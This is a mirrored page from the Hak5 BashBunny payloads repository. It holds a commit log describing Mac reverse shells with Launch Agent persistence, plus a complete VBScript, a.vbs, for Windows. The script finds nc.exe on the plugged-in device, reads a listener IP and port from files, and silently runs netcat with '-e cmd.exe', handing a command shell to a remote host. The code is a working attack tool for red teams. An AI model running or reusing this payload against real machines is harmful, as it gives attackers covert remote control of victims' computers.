mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
750d384df7
* Mac Reverse Shell Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval. * Mac Reverse Shell Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval. * Fixed additional MacReverseShell * Added readme.md files * Added readme.md files * Added readme.md * Added readme.md files * Added readme.md files * Updated for firmware 1.1 * Updated for firmware 1.1 * Added ThemeChanger and updated for firmware 1.1 * Updated readme.md * Updated for firmware 1.1 - using RUN command * Fixed issues with the new RUN - reverted * Fixed a few script problems * removed binary and updated readme.md * added a check for themepack * edited themechanger readme * updated readme.md and version
165 lines
5.5 KiB
Plaintext
165 lines
5.5 KiB
Plaintext
Option Explicit
|
|
|
|
'==============================================================================
|
|
' Title: a.vbs
|
|
' Author: RalphyZ
|
|
' Version: 1.1
|
|
' Target: Windows 7+
|
|
'
|
|
' Description:
|
|
' This VBScript is used by a BashBunny payload to
|
|
' to create a netcat reverse shell. The netcat listener
|
|
' IP Address and Port are stored in separate files - so that
|
|
' Red Teams can quickly change information. The "IncrementPort"
|
|
' subroutine will increase the port number by 1 every time the
|
|
' script is called. This is so that you can start multiple
|
|
' listeners while doing a PenTest, and grab multiple reverse
|
|
' shells in one trip. Uncomment that if you want the auto-increment
|
|
'
|
|
' Note: You must put the netcat executable in the switch directory with this
|
|
' script in order for it to work
|
|
'==============================================================================
|
|
|
|
' Declare Constants
|
|
Const ForReading = 1
|
|
Const ForWriting = 2
|
|
|
|
' Declare Global Variables
|
|
Dim strListenerPort, strNewListenerPort, strListenerIP
|
|
Dim objFSO, objFile, strCurrentDirectory
|
|
Dim strNetCatEXE, strListnerPortFile, strListenerIPFile
|
|
|
|
' The netcat executable name
|
|
strNetCatEXE = "nc.exe"
|
|
|
|
' The file containing the listener port
|
|
strListnerPortFile = "listener_port.txt"
|
|
|
|
' The file containing the listener ip address
|
|
strListenerIPFile = "listener_ip.txt"
|
|
|
|
' Create a File System Object
|
|
Set objFSO = CreateObject("Scripting.FileSystemObject")
|
|
|
|
' Set default value
|
|
strCurrentDirectory = ""
|
|
|
|
' The folder location
|
|
FindCurrentDirectory
|
|
|
|
' Read the Host IP Address (where the listener resides)
|
|
ReadHostIP
|
|
|
|
' Read the listener port
|
|
ReadPort
|
|
|
|
' Increment the listener port - for multiple shells
|
|
' Great for Red Teams
|
|
'IncrementPort
|
|
|
|
' Start NetCat Reverse Shell
|
|
StartNetCat
|
|
|
|
'==============================================================================
|
|
' Name: FindCurrentDirectory
|
|
' Arguments: None
|
|
' Return Value: None
|
|
' Description: Find the netcat executable
|
|
'==============================================================================
|
|
sub FindCurrentDirectory
|
|
Dim objDrives, d
|
|
|
|
' Search all drives for the netcat exe
|
|
Set objDrives = objFSO.Drives
|
|
For Each d in objDrives
|
|
If (objFSO.FileExists(d + "\payloads\switch1\" + strNetCatEXE)) Then
|
|
strCurrentDirectory = d + "\payloads\switch1\"
|
|
exit sub
|
|
ElseIf (objFSO.FileExists(d + "\payloads\switch2\" + strNetCatEXE)) Then
|
|
strCurrentDirectory = d + "\payloads\switch2\"
|
|
exit sub
|
|
End if
|
|
Next
|
|
End Sub
|
|
|
|
'==============================================================================
|
|
' Name: ReadHostIP
|
|
' Arguments: None
|
|
' Return Value: None
|
|
' Description: Read the listener IP
|
|
'==============================================================================
|
|
Sub ReadHostIP()
|
|
' Opens the file for reading
|
|
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading)
|
|
|
|
' Read the host IP
|
|
strListenerIP = objFile.ReadAll
|
|
|
|
' Close the file
|
|
objFile.Close
|
|
End Sub
|
|
|
|
|
|
'==============================================================================
|
|
' Name: ReadPort
|
|
' Arguments: None
|
|
' Return Value: None
|
|
' Description: Read the listener port
|
|
'==============================================================================
|
|
Sub ReadPort()
|
|
' Opens the file for reading
|
|
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading)
|
|
|
|
' Read the listener port
|
|
strListenerPort = objFile.ReadAll
|
|
|
|
' Close the file
|
|
objFile.Close
|
|
End Sub
|
|
|
|
'==============================================================================
|
|
' Name: IncrementPort
|
|
' Arguments: None
|
|
' Return Value: None
|
|
' Description: Read the listener port, increment the counter by 1, and write
|
|
' the new value
|
|
'==============================================================================
|
|
Sub IncrementPort()
|
|
' Increment the listener port
|
|
strNewListenerPort = strListenerPort + 1
|
|
|
|
' Open the file that contains the listener port for writing
|
|
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting)
|
|
|
|
' Write the new (incremented) port
|
|
objFile.WriteLine strNewListenerPort
|
|
|
|
' Close the file
|
|
objFile.Close
|
|
End Sub
|
|
|
|
'==============================================================================
|
|
' Name: StartNetCat
|
|
' Arguments: None
|
|
' Return Value: None
|
|
' Description: Start netcat on the appropriate port
|
|
'==============================================================================
|
|
Sub StartNetCat()
|
|
Dim strNetCat, strCommand, objShell
|
|
|
|
' Build the path to the netcat executable
|
|
strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE)
|
|
|
|
' Create the command string to run netcat on the correct ip and port,
|
|
' and serve cmd.exe to the listener
|
|
strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe"
|
|
|
|
' Create the WScript Shell object
|
|
Set objShell = WScript.CreateObject ("WScript.Shell")
|
|
|
|
' Run the command (' , 0'= hidden)
|
|
objShell.run strCommand, 0
|
|
|
|
' Free the object from memory
|
|
Set objShell = Nothing
|
|
End Sub |